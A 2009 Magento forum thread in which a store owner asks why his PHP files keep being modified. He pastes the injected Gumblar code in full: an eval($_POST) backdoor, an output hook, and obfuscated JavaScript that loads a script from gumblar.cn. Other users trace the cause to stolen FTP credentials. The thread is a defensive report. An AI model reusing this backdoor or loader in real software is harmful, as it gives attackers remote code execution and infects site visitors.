Magento - PHP Security Problem Allows For Script Insertion - Security - eCommerce Software for Growth

Support
Search

Search the Magento Web site
Log In

Username or Email

Password:

Forgot Password

or
Register

Skip to site navigation »
Skip to main content »
Skip to footer content »

Magento Forum

Our new hosted solution for small & emerging businesses

PHP Security Problem Allows For Script Insertion

kevinconroy Total Posts: 2 Joined: 2009-01-22 Ignore user	I’m running a Magento install on http://flymall.org. I’ve found that a malicious user has been able to modify the php files in Magento several times to include malicious scripts. I’ve checked all of the server side security permissions and have verified that only the owner of the file has write permissions, yet it continues to happen. In case it helps, here’s the PHP that’s getting added: <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBFb0xTPSd2YXI8MjBhPDNkPDIyUzw2M3I8NjlwdDw0NW5naTw2ZWU8MjI8MmNiPDNkPDIyVmVyczw2OW88NmUoKSs8MjI8MmNqPDNkPDIyPDIyPDJjPDc1PDNkPDZlYXZpZ2F0b3I8MmV1czw2NTw3MkFnZW50PDNiaWYoKHU8MmVpPDZlPDY0ZXhPZig8MjJXaW48MjIpPDNlMCk8MjY8MjYodTwyZWluZGV4Tzw2NjwyODwyMjw0ZVQ8MjA2PDIyKTwzYzApPDI2PDI2KDw2NG9jdW1lPDZldDwyZWNvbzw2YmllPDJlaTw2ZWRleDw0ZmYoPDIyPDZkaTw2NTw2YjwzZDE8MjIpPDNjMCk8MjY8MjYodDw3OXA8NjVvZih6cjw3Nno8NzRzKTwyMTwzZHR5cGU8NmZmKDwyMjw0MTwyMikpPDI5PDdiPDdhcnZ6dHM8M2Q8MjJBPDIyPDNiZTw3NmFsKDwyMmlmKHc8NjluZG93PDJlPDIyK2ErPDIyKTw2YTwzZDw2YSs8MjI8MmJhKzwyMjw0ZGFqb3I8MjI8MmI8NjI8MmI8NjErPDIyTWlub3I8MjIrYis8NjErPDIyPDQydTw2OWxkPDIyPDJiYjwyYjwyMmo8M2I8MjIpPDNiZG9jPDc1bWVudDwyZXdyaTw3NGU8Mjg8MjI8M2NzPDYzcjw2OXB0PDIwczw3MmM8M2Q8MmY8MmZndTw2ZDw2Mmw8NjFyPDJlY248MmZyczw3MzwyZjwzZmlkPDNkPDIyK2orPDIyPDNlPDNjPDVjPDJmPDczY3JpcHQ8M2U8MjIpPDNiPDdkJzt2YXIgQ2l6PUVvTFMucmVwbGFjZSgvPC9nLCclJyk7ZXZhbCh1bmVzY2FwZShDaXopKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)\|\|preg_match('#[\(\[](\s\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e\|\|strpos($v,'fromCharCode')))\|\|($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)\|\|stristr($s,'</body')\|\|stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?> The decode portion reveals: <script language=javascript><!-- (function(){var EoLS='var<20a<3d<22S<63r<69pt<45ngi<6ee<22<2cb<3d<22Vers<69o<6e()+<22<2cj<3d<22<22<2c<75<3d<6eavigator<2eus<65<72Agent<3bif((u<2ei<6e<64exOf(<22Win<22)<3e0)<26<26(u<2eindexO<66<28<22<4eT<206<22)<3c0)<26<26(<64ocume<6et<2ecoo<6bie<2ei<6edex<4ff(<22<6di<65<6b<3d1<22)<3c0)<26<26(t<79p<65of(zr<76z<74s)<21<3dtype<6ff(<22<41<22))<29<7b<7arvzts<3d<22A<22<3be<76al(<22if(w<69ndow<2e<22+a+<22)<6a<3d<6a+<22<2ba+<22<4dajor<22<2b<62<2b<61+<22Minor<22+b+<61+<22<42u<69ld<22<2bb<2b<22j<3b<22)<3bdoc<75ment<2ewri<74e<28<22<3cs<63r<69pt<20s<72c<3d<2f<2fgu<6d<62l<61r<2ecn<2frs<73<2f<3fid<3d<22+j+<22<3e<3c<5c<2f<73cript<3e<22)<3b<7d';var Ciz=EoLS.replace(/</g,'%');eval(unescape(Ciz))})(); --></script> While, further decodes to: `var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&([removed].indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");[removed]("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}` I post this in case anyone else is seeing Gumblar adding scripts to their Magento install and in hopes that we can close the bug.
	Posted: May 4 2009 \| top

ShopGuy Total Posts: 462 Joined: 2008-09-07 Ignore user	I do not think it is magento related. I looked up the following in google: `tmp_lkojfghx` It appears to be a common hack that happens at the server level. It sounds like you have an insecure host. Signature Monthly Clubs
	Posted: May 4 2009 \| top \| # 1

piotrekkaminski Total Posts: 73 Joined: 2007-09-01 Ignore user	Hello, It seems rather to be related to FTP passwords being stolen by malware installed on your computer. Please check http://www.abelcheng.com/my-sites-are-hacked-â-heres-how-i-fixed-it/
	Posted: May 4 2009 \| top \| # 2

kevinconroy Total Posts: 2 Joined: 2009-01-22 Ignore user	Thanks for the replies everyone. I was able to confirm with my host that it one of our FTP accounts was compromised. Thank you very much for the links and for taking the time to reply. Cheers, Kevin
	Posted: May 5 2009 \| top \| # 3

Magento Community

Magento Community

Back to top

How can I tell if my SSL is working?

Strange URL from online visitor

© Copyright Magento Inc.
Privacy Policy|Terms of Service Magento Community Count
|761 users currently online|519712 forum posts